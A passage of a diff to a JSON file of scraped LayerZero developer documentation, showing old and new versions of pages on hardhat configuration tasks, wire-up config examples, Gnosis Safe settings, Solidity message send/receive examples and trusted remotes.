bsc,polygon,avalanche --name OFT setConfig sets the configuration of the specified contract. Parameters: config-path - the relative path to a file containing the configuration. address - the address of the deployed contracts. An optional parameter. It should be provided if the contract address is the same on all chains. For contracts with different addresses, specify the address for each chain in the config. name - the name of the deployed contracts. An optional parameter. It should be provided only if the same contract deployed on all chains using hardhat-deploy and the deployment information is located in the deployments folder. For contracts with different names, specify the name for each chain in the config. gnosis-config-path - the relative path to a file containing the gnosis configuration. An optional parameter. If specified, the transactions will be sent to Gnosis. Usage: npx hardhat setConfig --networks ethereum,bsc,avalanche --name OFT --config-path \"./appConfig.json\" --gnosis-config-path \"./gnosisConfig.json\" Below is an example of the application configuration { \"ethereum\" : { \"address\" : \"\" , \"name\" : \"ProxyOFT\" , \"sendVersion\" : 2 , \"receiveVersion\" : 2 , \"remoteConfigs\" : [ { \"remoteChain\" : \"bsc\" , \"inboundProofLibraryVersion\" : 1 , \"inboundBlockConfirmations\" : 20 , \"relayer\" : \"0x902F09715B6303d4173037652FA7377e5b98089E\" , \"outboundProofType\" : 1 , \"outboundBlockConfirmations\" : 15 , \"oracle\" : \"0x5a54fe5234E811466D5366846283323c954310B2\" }, { \"remoteChain\" : \"avalanche\" , \"inboundProofLibraryVersion\" : 1 , \"inboundBlockConfirmations\" : 12 , \"relayer\" : \"0x902F09715B6303d4173037652FA7377e5b98089E\" , \"outboundProofType\" : 1 , \"outboundBlockConfirmations\" : 15 , \"oracle\" : \"0x5a54fe5234E811466D5366846283323c954310B2\" } ] }, \"bsc\" : { \"address\" : \"0x0702c7B1b18E5EBf022e17182b52F0AC262A8062\" , \"name\" : \"\" , \"sendVersion\" : 2 , \"receiveVersion\" : 2 , \"remoteConfigs\" : [ { \"remoteChain\" : \"ethereum\" , \"inboundProofLibraryVersion\" : 1 , \"inboundBlockConfirmations\" : 15 , \"relayer\" : \"0xA27A2cA24DD28Ce14Fb5f5844b59851F03DCf182\" , \"outboundProofType\" : 1 , \"outboundBlockConfirmations\" : 20 , \"oracle\" : \"0x5a54fe5234E811466D5366846283323c954310B2\" } ] } } The top level elements represent chains the contracts are deployed to. The configuration section for each chain has the following fields: address - the contract address. An optional parameter. It should be provided if no address was specified in the task parameters. name - the contract name. An optional parameter. It should be provided only if the contract was deployed using hardhat-deploy and the deployment information is located in the deployments folder. sendVersion - the version of a messaging library contract used to send messages. If it isn't specified, the default version will be used. receiveVersion - the version of a messaging library contract used to receive messages. If it isn't specified, the default version will be used. remoteConfigs - an array of configuration settings for remote chains. The configuration section for each chain has the following fields: remoteChain - the remote chain name. inboundProofLibraryVersion - the version of proof library for inbound messages. inboundBlockConfirmations - the number of block confirmations for inbound messages. relayer - the address of Relayer contract. outboundProofType - proof type used for outbound messages. outboundBlockConfirmations - the number of block confirmations for outbound messages. oracle - the address of the Oracle contract. Below is an example of the Gnosis configuration { \"ethereum\" : { \"safeAddress\" : \"0xa36B7e7894aCfaa6c35A8A0EC630B71A6B8A6D22\" , \"url\" : \"https://safe-transaction.mainnet.gnosis.io/\" }, \"bsc\" : { \"safeAddress\" : \"0x4755D44c1C196dC524848200B0556A09084D1dFD\" , \"url\" : \"https://safe-transaction.bsc.gnosis.io/\" }, \"avalanche\" : { \"safeAddress\" : \"0x4FF2C33FD9042a76eaC920C037383E51659417Ee\" , \"url\" : \"https://safe-transaction.avalanche.gnosis.io/\" } } For each chain you need to specify your Gnosis safe address and Gnosis Safe API url. You can find the list of supported chains and API urls in Gnosis Safe documentation . EVM Guides - Previous LayerZero Tooling Next Wire Up Configuration Last modified 3mo ago", + "body": "UA Configuration Describes the available config options in the appConfig.json Tasks The package adds the following tasks: getDefaultConfig returns the default configuration for the specified chains. Usage: npx hardhat getDefaultConfig --networks ethereum,bsc,polygon,avalanche getConfig returns the configuration of the specified contract. Parameters: address - the contract address. An optional parameter. Either contract name or contract address must be specified. name - the contract name. An optional parameter. It must be specified only if the contract was deployed using hardhat-deploy and the deployments information is located in the deployments folder. network - the network the contract is deployed to. remote-networks - a comma separated list of remote networks the contract is configured with. Usage: npx hardhat getConfig --network ethereum --remote-networks bsc,polygon,avalanche --name OFT setConfig sets the configuration of the specified contract. Parameters: config-path - the relative path to a file containing the configuration. address - the address of the deployed contracts. An optional parameter. It should be provided if the contract address is the same on all chains. For contracts with different addresses, specify the address for each chain in the config. name - the name of the deployed contracts. An optional parameter. It should be provided only if the same contract deployed on all chains using hardhat-deploy and the deployment information is located in the deployments folder. For contracts with different names, specify the name for each chain in the config. gnosis-config-path - the relative path to a file containing the gnosis configuration. An optional parameter. If specified, the transactions will be sent to Gnosis. Usage: npx hardhat setConfig --networks ethereum,bsc,avalanche --name OFT --config-path \"./appConfig.json\" --gnosis-config-path \"./gnosisConfig.json\" Below is an example of the application configuration { \"ethereum\" : { \"address\" : \"\" , \"name\" : \"ProxyOFT\" , \"sendVersion\" : 2 , \"receiveVersion\" : 2 , \"remoteConfigs\" : [ { \"remoteChain\" : \"bsc\" , \"inboundProofLibraryVersion\" : 1 , \"inboundBlockConfirmations\" : 20 , \"relayer\" : \"0x902F09715B6303d4173037652FA7377e5b98089E\" , \"outboundProofType\" : 1 , \"outboundBlockConfirmations\" : 15 , \"oracle\" : \"0x5a54fe5234E811466D5366846283323c954310B2\" }, { \"remoteChain\" : \"avalanche\" , \"inboundProofLibraryVersion\" : 1 , \"inboundBlockConfirmations\" : 12 , \"relayer\" : \"0x902F09715B6303d4173037652FA7377e5b98089E\" , \"outboundProofType\" : 1 , \"outboundBlockConfirmations\" : 15 , \"oracle\" : \"0x5a54fe5234E811466D5366846283323c954310B2\" } ] }, \"bsc\" : { \"address\" : \"0x0702c7B1b18E5EBf022e17182b52F0AC262A8062\" , \"name\" : \"\" , \"sendVersion\" : 2 , \"receiveVersion\" : 2 , \"remoteConfigs\" : [ { \"remoteChain\" : \"ethereum\" , \"inboundProofLibraryVersion\" : 1 , \"inboundBlockConfirmations\" : 15 , \"relayer\" : \"0xA27A2cA24DD28Ce14Fb5f5844b59851F03DCf182\" , \"outboundProofType\" : 1 , \"outboundBlockConfirmations\" : 20 , \"oracle\" : \"0x5a54fe5234E811466D5366846283323c954310B2\" } ] } } The top level elements represent chains the contracts are deployed to. The configuration section for each chain has the following fields: address - the contract address. An optional parameter. It should be provided if no address was specified in the task parameters. name - the contract name. An optional parameter. It should be provided only if the contract was deployed using hardhat-deploy and the deployment information is located in the deployments folder. sendVersion - the version of a messaging library contract used to send messages. If it isn't specified, the default version will be used. receiveVersion - the version of a messaging library contract used to receive messages. If it isn't specified, the default version will be used. remoteConfigs - an array of configuration settings for remote chains. The configuration section for each chain has the following fields: remoteChain - the remote chain name. inboundProofLibraryVersion - the version of proof library for inbound messages. inboundBlockConfirmations - the number of block confirmations for inbound messages. relayer - the address of Relayer contract. outboundProofType - proof type used for outbound messages. outboundBlockConfirmations - the number of block confirmations for outbound messages. oracle - the address of the Oracle contract. Below is an example of the Gnosis configuration { \"ethereum\" : { \"safeAddress\" : \"0xa36B7e7894aCfaa6c35A8A0EC630B71A6B8A6D22\" , \"url\" : \"https://safe-transaction.mainnet.gnosis.io/\" }, \"bsc\" : { \"safeAddress\" : \"0x4755D44c1C196dC524848200B0556A09084D1dFD\" , \"url\" : \"https://safe-transaction.bsc.gnosis.io/\" }, \"avalanche\" : { \"safeAddress\" : \"0x4FF2C33FD9042a76eaC920C037383E51659417Ee\" , \"url\" : \"https://safe-transaction.avalanche.gnosis.io/\" } } For each chain you need to specify your Gnosis safe address and Gnosis Safe API url. You can find the list of supported chains and API urls in Gnosis Safe documentation . EVM Guides - Previous LayerZero Tooling Next Wire Up Configuration Last modified 21d ago", "labels": [ "Documentation" ] @@ -1610,7 +1602,7 @@ { "title": "Wire Up Configuration", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-tooling/wire-up-configuration", - "body": "Wire Up Configuration Describes the available config options in the wireUpConfig.json Available configuration options To use the LayerZero wire up configuration please correctly fill in your wireUpConfig.json { \"proxyContractConfig\" { \"chain\" : \"avalanche\" , \"name\" : \"ProxyOFT\" }, \"contractConfig\" { \"name\" : \"OFT\" }, \"chainConfig\" : { \"avalanche\" : { \"defaultFeeBp\" : 2 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"ethereum\" : { \"feeBpConfig\" : { \"feeBp\" : 5 , \"enabled\" : true }, \"minDstGasConfig\" : [ 100000 , 200000 ] }, \"polygon\" : { \"minDstGasConfig\" : [ 100000 , 160000 ] } } } } } The proxyContractConfig is an optional setting, that defines the proxy chain and proxy contract name. chain : An optional string, defines the proxy chain. name : An optional string, defines the proxy contract name. address : A optional string, defines the contract address. Used when deployments folder are not available. Uses standard LzApp/Nonblocking/OFT/ONFT abi calls such as: function setFeeBp(uint16, bool, uint16) function setDefaultFeeBp(uint16) function setMinDstGas(uint16, uint16, uint) function setUseCustomAdapterParams(bool) function setTrustedRemote(uint16, bytes) The contractConfig is a conditionally required setting, that defines the contract name. name : A conditionally required string, defines the contract name. Used when all contract names are the same on all chains, excluding proxy. The chainConfig : is required and defines the chain settings (default fees, useCustomAdapterParams) and the remote chain configs (minDstGas config based of packetType, and custom feeBP per chain) name : A conditionally required string, defines the contract name. Used when contract names differ per chain. address : A conditionally required string, defines the contract address. Used when deployments folder are not available. Uses standard LzApp/Nonblocking/OFT/ONFT abi calls. defaultFeeBp : An optional number, defines the default fee bp for the chain. (Available in OFTV2 w/ fee .) useCustomAdapterParams : An optional bool that defaults to false . Uses default 200k destination gas on all cross chain messages. When false adapter parameters must be empty. When useCustomAdapterParams is true the minDstGasLookup must be set for each packet type and each chain . This requires whoever calls the send function to provide the adapter params with a destination gas >= amount set for that packet type and that destination chain. The remoteNetworkConfig is a required setting that defines the remote chain configs (minDstGas config based on packetType, and custom feeBP per chain) minDstGasConfig : is an optional array of numbers that defines the minDstGas required based off packetType. In the example above minDstGasConfig has a length of 2 with the indexes representing the packet type. So for example when the UA on Avalanche sends packet type 0 to Ethereum the minDstGas will be 100000. When the UA on Avalanche sends packet type 1 to Polygon the minDstGas will be 160000. The feeBpConfig is an optional setting that defines custom feeBP per chain. ( Note: setting custom fee per chain with enabled = TRUE, will triumph over defaultFeeBp.) feeBp : is an optional number, defines custom feeBP per chain. enabled : is an optional bool, defines if custom feeBP per chain is enabled Example wireUpConfigs Example 1: { \"contractConfig\" { \"name\" : \"OFT\" }, \"fuji\" : { \"defaultFeeBp\" : 5 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"arbitrum-goerli\" : { \"minDstGasConfig\" : [ 2000000 , 3200000 ] }, \"bsc-testnet\" : { \"minDstGasConfig\" : [ 100000 , 160000 ] } } } } This configuration is setting a defaultFeeBp of 5 for all transactions on fuji. This configuration is also setting the minDstGasLookup based on packet types. The minDstGasConfig has a length of 2 with the indexes representing the packet type. So for example when the UA on fuji sends packet type 0 to arbitrum-goerli the minDstGas will be 2000000. When the UA on fuji sends packet type 1 to bsc-testnet the minDstGas will be 160000. Example 2: { \"proxyContractConfig\" : { \"chain\" : \"fuji\" , \"name\" : \"ExampleProxyOFTV2\" } \"chainConfig\" : { \"fuji\" : { \"remoteNetworkConfig\" : { \"arbitrum-goerli\" : { \"feeBpConfig\" : { \"enabled\" : true , \"feeBp\" : 2 } }, \"bsc-testnet\" : { \"feeBpConfig\" : { \"enabled\" : true , \"feeBp\" : 3 } } } }, \"bsc-testnet\" : { \"name\" : \"BscOFTV2\" , \"remoteNetworkConfig\" : { \"arbitrum-goerli\" : { \"feeBpConfig\" : { \"feeBp\" : 5 , \"enabled\" : true } }, \"fuji\" : { \"feeBpConfig\" : { \"feeBp\" : 4 , \"enabled\" : true } } } }, \"arbitrum-goerli\" : { \"name\" : \"ArbitrumOFTV2\" , \"remoteNetworkConfig\" : { \"bsc-testnet\" : { \"feeBpConfig\" : { \"feeBp\" : 1 , \"enabled\" : true } }, \"fuji\" : { \"feeBpConfig\" : { \"feeBp\" : 2 , \"enabled\" : true } } } } } } This configuration uses name per chain because each chain has a different contract name. This configuration is setting a custom bp fee per pathway instead of a defaultFeeBp. This configuration is not using custom adapter params and is opting into the default 200000 gas . Example 3: { \"proxyContractConfig\" : { \"chain\" : \"fuji\" , \"address\" : \"0x0000000000000000000000000000000000000000\" }, \"chainConfig\" : { \"fuji\" : { \"defaultFeeBp\" : 0 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"bsc-testnet\" : { \"feeBpConfig\" : { \"enabled\" : false , \"feeBp\" : 0 }, \"minDstGasConfig\" : [ 100000 , 160000 ] } } }, \"bsc-testnet\" : { \"address\" : \"0x0000000000000000000000000000000000000000\" , \"defaultFeeBp\" : 0 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"fuji\" : { \"feeBpConfig\" : { \"feeBp\" : 0 , \"enabled\" : false }, \"minDstGasConfig\" : [ 100000 , 160000 ] } } } } } This configuration uses address per chain and relys on the contracts containing the following ABI's: function setTrustedRemote(uint16, bytes) function setUseCustomAdapterParams(bool) function setMinDstGas(uint16, uint16, uint) function setDefaultFeeBp(uint16) function setFeeBp(uint16, bool, uint16) Previous UA Configuration Next - EVM Guides Omnichain Governance Last modified 3mo ago", + "body": "Wire Up Configuration Describes the available config options in the wireUpConfig.json Available configuration options To use the LayerZero wire up configuration please correctly fill in your wireUpConfig.json { \"proxyContractConfig\" : { \"chain\" : \"avalanche\" , \"name\" : \"ProxyOFT\" }, \"contractConfig\" : { \"name\" : \"OFT\" }, \"chainConfig\" : { \"avalanche\" : { \"defaultFeeBp\" : 2 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"ethereum\" : { \"feeBpConfig\" : { \"feeBp\" : 5 , \"enabled\" : true }, \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 2000000 } }, \"polygon\" : { \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } } } } } } The proxyContractConfig is an optional setting, that defines the proxy chain and proxy contract name. chain : An optional string, defines the proxy chain. name : An optional string, defines the proxy contract name. address : A optional string, defines the contract address. Used when deployments folder are not available. Uses standard LzApp/Nonblocking/OFT/ONFT abi calls such as: function setFeeBp(uint16, bool, uint16) function setDefaultFeeBp(uint16) function setMinDstGas(uint16, uint16, uint) function setUseCustomAdapterParams(bool) function setTrustedRemote(uint16, bytes) The contractConfig is a conditionally required setting, that defines the contract name. name : A conditionally required string, defines the contract name. Used when all contract names are the same on all chains, excluding proxy. The chainConfig : is required and defines the chain settings (default fees, useCustomAdapterParams) and the remote chain configs (minDstGas config based of packetType, and custom feeBP per chain) name : A conditionally required string, defines the contract name. Used when contract names differ per chain. address : A conditionally required string, defines the contract address. Used when deployments folder are not available. Uses standard LzApp/Nonblocking/OFT/ONFT abi calls. defaultFeeBp : An optional number, defines the default fee bp for the chain. (Available in OFTV2 w/ fee .) useCustomAdapterParams : An optional bool that defaults to false . Uses default 200k destination gas on all cross chain messages. When false adapter parameters must be empty. When useCustomAdapterParams is true the minDstGasLookup must be set for each packet type and each chain . This requires whoever calls the send function to provide the adapter params with a destination gas >= amount set for that packet type and that destination chain. The remoteNetworkConfig is a required setting that defines the remote chain configs (minDstGas config based on packetType, and custom feeBP per chain) minDstGasConfig : is an optional object that defines the minDstGas required based off packetType. So for example when the UA on Avalanche sends packet type 0 to Ethereum the minDstGas will be 100000. When the UA on Avalanche sends packet type 1 to Polygon the minDstGas will be 160000. The feeBpConfig is an optional setting that defines custom feeBP per chain. ( Note: setting custom fee per chain with enabled = TRUE, will triumph over defaultFeeBp.) feeBp : is an optional number, defines custom feeBP per chain. enabled : is an optional bool, defines if custom feeBP per chain is enabled Example wireUpConfigs Example 1: { \"contractConfig\" { \"name\" : \"OFT\" }, \"fuji\" : { \"defaultFeeBp\" : 5 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"arbitrum-goerli\" : { \"minDstGasConfig\" : { \"packetType_0\" : 2000000 , \"packetType_1\" : 3200000 } }, \"bsc-testnet\" : { \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } } } } } This configuration is setting a defaultFeeBp of 5 for all transactions on fuji. This configuration is also setting the minDstGasLookup based on packet types. The minDstGasConfig has a length of 2 with the indexes representing the packet type. So for example when the UA on fuji sends packet type 0 to arbitrum-goerli the minDstGas will be 2000000. When the UA on fuji sends packet type 1 to bsc-testnet the minDstGas will be 160000. Example 2: { \"proxyContractConfig\" : { \"chain\" : \"fuji\" , \"name\" : \"ExampleProxyOFTV2\" } \"chainConfig\" : { \"fuji\" : { \"remoteNetworkConfig\" : { \"arbitrum-goerli\" : { \"feeBpConfig\" : { \"enabled\" : true , \"feeBp\" : 2 }, \"minDstGasConfig\" : { \"packetType_0\" : 2000000 , \"packetType_1\" : 3200000 } }, \"bsc-testnet\" : { \"feeBpConfig\" : { \"enabled\" : true , \"feeBp\" : 3 }, \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } } } }, \"bsc-testnet\" : { \"name\" : \"BscOFTV2\" , \"remoteNetworkConfig\" : { \"arbitrum-goerli\" : { \"feeBpConfig\" : { \"feeBp\" : 5 , \"enabled\" : true }, \"minDstGasConfig\" : { \"packetType_0\" : 2000000 , \"packetType_1\" : 3200000 } }, \"fuji\" : { \"feeBpConfig\" : { \"feeBp\" : 4 , \"enabled\" : true }, \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } } } }, \"arbitrum-goerli\" : { \"name\" : \"ArbitrumOFTV2\" , \"remoteNetworkConfig\" : { \"bsc-testnet\" : { \"feeBpConfig\" : { \"feeBp\" : 1 , \"enabled\" : true }, \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } }, \"fuji\" : { \"feeBpConfig\" : { \"feeBp\" : 2 , \"enabled\" : true }, \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } } } } } } This configuration uses name per chain because each chain has a different contract name. This configuration is setting a custom bp fee per pathway instead of a defaultFeeBp. Example 3: { \"proxyContractConfig\" : { \"chain\" : \"fuji\" , \"address\" : \"0x0000000000000000000000000000000000000000\" }, \"chainConfig\" : { \"fuji\" : { \"defaultFeeBp\" : 0 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"bsc-testnet\" : { \"feeBpConfig\" : { \"enabled\" : false , \"feeBp\" : 0 }, \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } } } }, \"bsc-testnet\" : { \"address\" : \"0x0000000000000000000000000000000000000000\" , \"defaultFeeBp\" : 0 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"fuji\" : { \"feeBpConfig\" : { \"feeBp\" : 0 , \"enabled\" : false }, \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } } } } } } This configuration uses address per chain and relys on the contracts containing the following ABI's: function setTrustedRemote(uint16, bytes) function setUseCustomAdapterParams(bool) function setMinDstGas(uint16, uint16, uint) function setDefaultFeeBp(uint16) function setFeeBp(uint16, bool, uint16) Previous UA Configuration Next - EVM Guides Omnichain Governance Last modified 14d ago", "labels": [ "Documentation" ] @@ -1618,7 +1610,7 @@ { "title": "Send Messages", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/master/how-to-send-a-message", - "body": "Send Messages Use LayerZero to send a bytes payload from one chain to another. To send a message, call the Endpoint's send() function. Initiate the send() function in your contracts (similar to the CounterMock ) to send a cross chain message. // an endpoint is the contract which has the send() function ILayerZeroEndpoint public endpoint ; // remote address concated with local address packed into 40 bytes bytes memory remoteAndLocalAddresses = abi . encodePacked ( remoteAddress , localAddress ); // call send() to send a message/payload to another chain endpoint . send { value : msg . value }( 10001 , // destination LayerZero chainId remoteAndLocalAddresses , // send to this address on the destination bytes ( \"hello\" ), // bytes payload msg . sender , // refund address address ( 0x0 ), // future parameter bytes ( \"\" ) // adapterParams (see \"Advanced Features\") ); Here is an explanation of the endpoint.send() interface: // @notice send a LayerZero message to the specified address at a LayerZero endpoint specified by our chainId. // @param _dstChainId - the destination chain identifier // @param _remoteAndLocalAddresses - remote address concated with local address packed into 40 bytes // @param _payload - a custom bytes payload to send to the destination contract // @param _refundAddress - if the source transaction is cheaper than the amount of value passed, refund the additional amount to this address // @param _zroPaymentAddress - the address of the ZRO token holder who would pay for the transaction // @param _adapterParams - parameters for custom functionality. e.g. receive airdropped native gas from the relayer on destination function send ( uint16 _dstChainId , bytes calldata _remoteAndLocalAddresses , bytes calldata _payload , address payable _refundAddress , address _zroPaymentAddress , bytes calldata _adapterParams ) external payable ; You will note in the topmost example we call send() with {value: msg.value} this is because send() requires a bit of native gas token so the relayer can complete the message delivery on the destination chain. If you don't set this value you might get this error when calling endpoint.send() Putting it into a more complete example, your User Application contract may look something like this: pragma solidity 0.8.4 ; pragma abicoder v2 ; import \"../lzApp/NonblockingLzApp.sol\" ; /// @title A LayerZero example sending a cross chain message from a source chain to a destination chain to increment a counter contract OmniCounter is NonblockingLzApp { uint public counter ; constructor ( address _lzEndpoint ) NonblockingLzApp ( _lzEndpoint ) {} function _nonblockingLzReceive ( uint16 , bytes memory , uint64 , bytes memory ) internal override { // _nonblockingLzReceive is how we provide custom logic to lzReceive() // in this case, increment a counter when a message is received. counter += 1 ; } function incrementCounter ( uint16 _dstChainId ) public payable { // _lzSend calls endpoint.send() _lzSend ( _dstChainId , bytes ( \"\" ), payable ( msg . sender ), address ( 0x0 ), bytes ( \"\" )); } } There you have it! Call incrementCounter() to send a LayerZero message to another chain. See the next section for how to handle receiving the message by implementing lzReceive() and also see how to execute any smart contract logic on the destination. Putting together a full User Application contract simply means implementing a way to call endpoint.send() and ensuring lzReceive() is overridden to handle receiving messages (see ILayerZeroReceiver.sol for the lzReceive() interface) OmniChainToken is a slightly more complex example of a omnichain contract. Estimating Message Fees If you want to know how much {value: xxx} to give to the send() function to pay for you message please refer to this section on estimating fees . Adapter Parameters Also see advanced message features using Adapter Parameters (aka: _adapterParameters ) EVM Guides - Previous Getting Started Next Receive Messages Last modified 3mo ago", + "body": "Send Messages Use LayerZero to send a bytes payload from one chain to another. To send a message, call the Endpoint's send() function. Initiate the send() function in your contracts (similar to the CounterMock ) to send a cross chain message. // an endpoint is the contract which has the send() function ILayerZeroEndpoint public endpoint ; // remote address concated with local address packed into 40 bytes bytes memory remoteAndLocalAddresses = abi . encodePacked ( remoteAddress , localAddress ); // call send() to send a message/payload to another chain endpoint . send { value : msg . value }( 10001 , // destination LayerZero chainId remoteAndLocalAddresses , // send to this address on the destination bytes ( \"hello\" ), // bytes payload msg . sender , // refund address address ( 0x0 ), // future parameter bytes ( \"\" ) // adapterParams (see \"Advanced Features\") ); Here is an explanation of the endpoint.send() interface: // @notice send a LayerZero message to the specified address at a LayerZero endpoint specified by our chainId. // @param _dstChainId - the destination chain identifier // @param _remoteAndLocalAddresses - remote address concated with local address packed into 40 bytes // @param _payload - a custom bytes payload to send to the destination contract // @param _refundAddress - if the source transaction is cheaper than the amount of value passed, refund the additional amount to this address // @param _zroPaymentAddress - the address of the ZRO token holder who would pay for the transaction // @param _adapterParams - parameters for custom functionality. e.g. receive airdropped native gas from the relayer on destination function send ( uint16 _dstChainId , bytes calldata _remoteAndLocalAddresses , bytes calldata _payload , address payable _refundAddress , address _zroPaymentAddress , bytes calldata _adapterParams ) external payable ; You will note in the topmost example we call send() with {value: msg.value} this is because send() requires a bit of native gas token so the relayer can complete the message delivery on the destination chain. If you don't set this value you might get this error when calling endpoint.send() Putting it into a more complete example, your User Application contract may look something like this: pragma solidity 0.8.4 ; pragma abicoder v2 ; import \"../lzApp/NonblockingLzApp.sol\" ; /// @title A LayerZero example sending a cross chain message from a source chain to a destination chain to increment a counter contract OmniCounter is NonblockingLzApp { uint public counter ; constructor ( address _lzEndpoint ) NonblockingLzApp ( _lzEndpoint ) {} function _nonblockingLzReceive ( uint16 , bytes memory , uint64 , bytes memory ) internal override { // _nonblockingLzReceive is how we provide custom logic to lzReceive() // in this case, increment a counter when a message is received. counter += 1 ; } function incrementCounter ( uint16 _dstChainId ) public payable { // _lzSend calls endpoint.send() _lzSend ( _dstChainId , bytes ( \"\" ), payable ( msg . sender ), address ( 0x0 ), bytes ( \"\" )); } } There you have it! Call incrementCounter() to send a LayerZero message to another chain. See the next section for how to handle receiving the message by implementing lzReceive() and also see how to execute any smart contract logic on the destination. Putting together a full User Application contract simply means implementing a way to call endpoint.send() and ensuring lzReceive() is overridden to handle receiving messages (see ILayerZeroReceiver.sol for the lzReceive() interface) OmniChainToken is a slightly more complex example of a omnichain contract. Estimating Message Fees If you want to know how much {value: xxx} to give to the send() function to pay for you message please refer to this section on estimating fees . Adapter Parameters Also see advanced message features using Adapter Parameters (aka: _adapterParameters ) EVM Guides - Previous Getting Started Next Receive Messages Last modified 1d ago", "labels": [ "Documentation" ] @@ -1626,7 +1618,7 @@ { "title": "Receive Messages", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/master/receive-messages", - "body": "Receive Messages Destination contracts must implement lzReceive() to handle incoming messages The code snippet explains how the message will be received. To receive a message, your User Application contract must implement the ILayerZeroReceiver interface and override the lzReceive() function pragma solidity >= 0.5.0 ; interface ILayerZeroReceiver { // @notice LayerZero endpoint will invoke this function to deliver the message on the destination // @param _srcChainId - the source endpoint identifier // @param _srcAddress - the source sending contract address from the source chain // @param _nonce - the ordered message nonce // @param _payload - the signed payload is the UA bytes has encoded to be sent function lzReceive ( uint16 _srcChainId , bytes calldata _srcAddress , uint64 _nonce , bytes calldata _payload ) external ; } Below is a snippet that shows an implementation of lzReceive() . Here we demonstrate how to extract an address out of the payload and increment a counter each time this contract receives any message. UAs should authenticate the received messages with: the caller is the known LayerZero endpoint the srcAddress is a trusted known address on the _srcChain . If the application will connect non-evm chains, the UA should use bytes to store addresses. mapping ( address => uint ) public addrCounter ; mapping ( uint16 => bytes ) public trustedRemoteLookup ; // override from ILayerZeroReceiver.sol function lzReceive ( uint16 _srcChainId , bytes memory _srcAddress , uint64 _nonce , bytes memory _payload ) override external { require ( msg . sender == address ( endpoint )); require ( keccak256 ( _srcAddress ) == keccak256 ( trustedRemoteLookup [ _srcChainId ]); address fromAddress ; assembly { fromAddress := mload ( add ( _srcAddress , 20 )) } addrCounter [ fromAddress ] += 1 ; } Check the CounterMock for examples. Previous Send Messages Next Set Trusted Remotes Last modified 3mo ago", + "body": "Receive Messages Destination contracts must implement lzReceive() to handle incoming messages The code snippet explains how the message will be received. To receive a message, your User Application contract must implement the ILayerZeroReceiver interface and override the lzReceive() function pragma solidity >= 0.5.0 ; interface ILayerZeroReceiver { // @notice LayerZero endpoint will invoke this function to deliver the message on the destination // @param _srcChainId - the source endpoint identifier // @param _srcAddress - the source sending contract address from the source chain // @param _nonce - the ordered message nonce // @param _payload - the signed payload is the UA bytes has encoded to be sent function lzReceive ( uint16 _srcChainId , bytes calldata _srcAddress , uint64 _nonce , bytes calldata _payload ) external ; } Below is a snippet that shows an implementation of lzReceive() . Here we demonstrate how to extract an address out of the payload and increment a counter each time this contract receives any message. UAs should authenticate the received messages with: the caller is the known LayerZero endpoint the srcAddress is a trusted known address on the _srcChain . If the application will connect non-evm chains, the UA should use bytes to store addresses. mapping ( address => uint ) public addrCounter ; mapping ( uint16 => bytes ) public trustedRemoteLookup ; // override from ILayerZeroReceiver.sol function lzReceive ( uint16 _srcChainId , bytes memory _srcAddress , uint64 _nonce , bytes memory _payload ) override external { require ( msg . sender == address ( endpoint )); require ( keccak256 ( _srcAddress ) == keccak256 ( trustedRemoteLookup [ _srcChainId ]); address fromAddress ; assembly { fromAddress := mload ( add ( _srcAddress , 20 )) } addrCounter [ fromAddress ] += 1 ; } Check the CounterMock for examples. Previous Send Messages Next Set Trusted Remotes Last modified 1d ago", "labels": [ "Documentation" ] @@ -1634,7 +1626,7 @@ { "title": "Set Trusted Remotes", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/master/set-trusted-remotes", - "body": "Set Trusted Remotes For a contract using LayerZero, a trusted remote is another contract it will accept messages from. What is a Trusted Remote? A trusted remote is the 40 bytes (for evm-to-evm messaging) that identifies another contract which you will receive messages from within your LayerZero User Application contract. The 40 bytes object is the packed bytes of the remoteAddress + localAddress The reason to care about Trusted Remotes is that from a security perspective contracts should only receive messages from known contracts. Hence, contracts are securely connected by \"setting trusted remotes\" The team has produced this GitHub Repository as an example of how to automate setting trusted remotes. 40 byte Format for EVM <> EVM, A Trusted Remote is 40 bytes. It is the REMOTE contract address concatenated with the LOCAL contract address. Solana, Aptos, et al. & 32 Byte Addresses For NON-evm chains with addresses that are not 20 bytes obviously the Trusted Remotes will not be exactly 40 bytes, but we will regularly use \"40 byte\" Trusted Remotes in the nomenclature. Generate TrustedRemote Using Ethers.js // the trusted remote (or sometimes referred to as the path or pathData) // is the packed 40 bytes object of the REMOTE + LOCAL user application contract addresses let trustedRemote = hre . ethers . utils . solidityPack ( [ 'address' , 'address' ], [ remoteContract . address , localContract . address ] ) Trusted Remote Usage: The Trusted Remote is now used in a few places. Here is a list of which functions expect the trusted remote format: Function Param Is it a trusted remote? Endpoint retryPayload() _srcAddress Endpoint hasStoredPayload() _srcAddress Endpoint forceResumeReceive() _srcAddress LzApp setTrustedRemote() _path LzApp isTrustedRemote() _srcAddress lzReceive() _srcAddress Previous Receive Messages Next - EVM Guides Advanced Last modified 3mo ago", + "body": "Set Trusted Remotes For a contract using LayerZero, a trusted remote is another contract it will accept messages from. What is a Trusted Remote? A trusted remote is the 40 bytes (for evm-to-evm messaging) that identifies another contract which you will receive messages from within your LayerZero User Application contract. The 40 bytes object is the packed bytes of the remoteAddress + localAddress The reason to care about Trusted Remotes is that from a security 